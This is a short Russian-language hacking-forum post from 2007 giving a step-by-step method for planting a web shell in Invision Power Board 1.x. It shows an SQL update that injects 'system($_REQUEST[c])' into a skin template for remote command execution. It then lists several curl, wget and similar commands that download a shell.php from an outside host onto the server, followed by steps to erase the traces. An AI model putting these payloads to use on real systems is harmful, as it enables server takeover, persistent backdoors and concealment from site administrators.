18.05.2007, 23:28
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Код:
Привет, я DeusTirael.
Сейчас я покажу как можно залить шелл в ИПБ 1.* если не катит способ через смайлы.
Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates
Нужно в столбце func_name изменить значение calendar_start_form
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"
Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";
Теперь ставим Use safe mode skins? > Yes
Готово! Заходим в календарь и в параметре 'c' передаем команды.
Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php
Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";
18.03.2007 by DeusTirael специально для DaMaGeLaB.OrG
Видео использовать только в целях ознакомления.
|
|
|